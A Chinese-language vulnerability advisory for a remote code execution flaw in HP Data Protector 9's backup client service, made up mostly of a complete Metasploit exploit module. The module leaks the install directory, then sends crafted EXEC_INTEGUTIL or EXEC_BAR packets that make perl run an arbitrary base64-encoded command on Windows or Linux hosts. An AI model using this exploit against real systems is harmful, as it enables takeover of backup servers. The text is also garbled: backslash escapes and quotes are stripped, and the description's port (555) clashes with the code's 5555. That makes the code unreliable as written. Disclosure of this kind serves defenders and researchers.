发布日期:2014-10-21
更新日期:2014-10-24受影响系统:
HP Data Protector 9
描述:
HP OpenView Storage Data Protector软件是企业环境中单个服务器自动备份和恢复的软件,支持磁盘存储或磁带存储目标。HP Data Protector 9在处理EXEC_INTEGUTIL消息时会触发Backup client服务内的漏洞,该服务默认监听在TCP/555上,成功利用此漏洞后可利用EXEC_INTEGUTIL数据包执行任意代码。<*来源:Aniway.Anyway
*>测试方法:警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## require "msf/core" class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell def initialize(info = {})
super(update_info(info,
"Name" => "HP Data Protector EXEC_INTEGUTIL Remote Code Execution",
"Description" => %q{
This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
request allows to execute arbitrary commands from a restricted directory. Since it
includes a perl executable, it"s possible to use an EXEC_INTEGUTIL packet to execute
arbitrary code. On linux targets, the perl binary isn"t on the restricted directory, but
an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
Data Protector for linux. This module has been tested successfully on HP Data Protector
9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
},
"Author" =>
[
"Aniway.Anyway <Aniway.Anyway[at]gmail.com>", # vulnerability discovery
"juan vazquez" # msf module
],
"References" =>
[
[ "ZDI", "14-344"]
],
"Payload" =>
{
"DisableNops" => true
},
"DefaultOptions" =>
{
# The powershell embedded payload takes some time to deploy
"WfsDelay" => 20
},
"Targets" =>
[
[ "Linux 64 bits / HP Data Protector 9",
{
"Platform" => "unix",
"Arch" => ARCH_CMD,
"Payload" => {
"Compat" => {
"PayloadType" => "cmd cmd_bash",
"RequiredCmd" => "perl gawk bash-tcp openssl python generic"
}
}
}
],
[ "Windows 64 bits / HP Data Protector 9",
{
"Platform" => "win",
"Arch" => ARCH_CMD,
"Payload" => {
"Compat" => {
"PayloadType" => "cmd",
"RequiredCmd" => "powershell"
}
}
}
]
],
"DefaultTarget" => 0,
"Privileged" => true,
"DisclosureDate" => "Oct 2 2014"
)) register_options(
[
Opt::RPORT(5555)
], self.class)
end def check
fingerprint = get_fingerprint if fingerprint.nil?
return Exploit::CheckCode::Unknown
end if fingerprint =~ /Data Protector A.(d+.d+)/
version = $1
vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
elsif fingerprint =~ / INET/
vprint_status("#{peer} - Linux / HP Data Protector found")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end if Gem::Version.new(version) <= Gem::Version.new("9")
return Exploit::CheckCode::Appears
end Exploit::CheckCode::Detected # there is no patch at the time of module writing
end def exploit
rand_exec = rand_text_alpha(8)
print_status("#{peer} - Leaking the HP Data Protector directory...")
leak = leak_hp_directory(rand_exec)
dir = parse_dir(leak, rand_exec) if dir.nil?
dir = default_hp_dir
print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
else
unless valid_target?(dir)
print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
end
end if target.name =~ /Windows/
#command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
print_status("#{peer} - Executing payload...")
execute_windows(payload.encoded, dir)
else
print_status("#{peer} - Executing payload...")
execute_linux(payload.encoded, dir)
end
end def peer
"#{rhost}:#{rport}"
end def build_pkt(fields)
data = "xffxfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}x00x00"
data << Rex::Text.to_unicode(" ") # Separator
end data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end def get_fingerprint
fingerprint = get_fingerprint_windows
if fingerprint.nil?
fingerprint = get_fingerprint_linux
end fingerprint
end def get_fingerprint_linux
connect sock.put([2].pack("N") + "xffxfe")
begin
res = sock.get_once(4)
rescue EOFError
disconnect
return nil
end if res.nil?
disconnect
return nil
else
length = res.unpack("N")[0]
end begin
res = sock.get_once(length)
rescue EOFError
return nil
ensure
disconnect
end if res.nil?
return nil
end res
end def get_fingerprint_windows
connect sock.put(rand_text_alpha_upper(64))
begin
res = sock.get_once(4)
rescue ::Errno::ECONNRESET, EOFError
disconnect
return nil
end if res.nil?
disconnect
return nil
else
length = res.unpack("N")[0]
end begin
res = sock.get_once(length)
rescue EOFError
return nil
ensure
disconnect
end if res.nil?
return nil
end Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
end def leak_hp_directory(rand_exec)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"28", # Opcode EXEC_INTEGUTIL
rand_exec,
]) sock.put(pkt)
begin
res = sock.get_once(4)
rescue EOFError
disconnect
return nil
end if res.nil?
disconnect
return nil
else
length = res.unpack("N")[0]
end begin
res = sock.get_once(length)
rescue EOFError
return nil
ensure
disconnect
end if res.nil?
return nil
end if res =~ /No such file or directory/ # Linux signature
return res
else # deal as windows target
return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
end
end def parse_dir(data, clue)
if data && data =~ /The system cannot find the file specified..*(.:\.*)bin\#{clue}/
dir = $1
print_good("#{peer} - HP Data Protector directory found on #{dir}")
elsif data && data =~ /]x00 (/.*)lbin/#{clue}x00 [d] No such file or directory/
dir = $1
print_good("#{peer} - HP Data Protector directory found on #{dir}")
else
dir = nil
end dir
end def valid_target?(dir)
if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\/
return true
elsif target.name =~ /Linux/ && dir.start_with?("/")
return true
end false
end def default_hp_dir
if target.name =~ /Windows/
dir = "C:\Program Files\OmniBack\"
else # linux
dir = "/opt/omni/lbin/"
end dir
end def execute_windows(cmd, hp_dir)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"28", # Opcode EXEC_INTEGUTIL
"perl.exe",
"-I#{hp_dir}lib\perl",
"-MMIME::Base64",
"-e",
"system(decode_base64("#{Rex::Text.encode_base64(cmd)}"))"
])
sock.put(pkt)
disconnect
end def execute_linux(cmd, hp_dir)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"11", # Opcode EXEC_BAR
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"../bin/perl",
rand_text_alpha(8),
"-I#{hp_dir}lib/perl",
"-MMIME::Base64",
"-e",
"system(decode_base64("#{Rex::Text.encode_base64(cmd)}"))"
])
sock.put(pkt)
disconnect
end
end建议:
厂商补丁:HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://itrc.hp.com
易网时代-编程资源站